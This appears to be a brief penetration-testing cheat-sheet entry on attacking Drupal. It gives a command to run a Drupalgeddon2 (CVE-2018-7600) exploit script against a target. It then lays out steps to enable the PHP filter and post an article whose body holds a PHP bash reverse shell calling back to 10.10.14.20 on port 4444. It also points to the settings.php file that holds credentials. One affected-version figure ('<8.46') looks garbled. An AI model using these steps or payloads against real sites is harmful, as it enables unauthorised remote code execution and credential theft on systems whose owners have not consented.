Drupal

Drupalgeddon (<7.58, <8.5.1, <8.46, <8.3.9) - CVE-2018-7600

All version of drupal lower than 7.58 are vulnerable to RCE.

ruby drupalgeddon2.rb http://<ip>/

Firstly we need to enable PHP filter on Modules tab.

And go to Content -> +Add Content -> Article, select PHP code as Text Format and finally introduce the reverse shell on the body.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444>&1'"); ?>

Finally clicking Preview button a reverse shell is spawned to our listener.

$DRUPAL/sites/default/settings.php

Last updated 2 years ago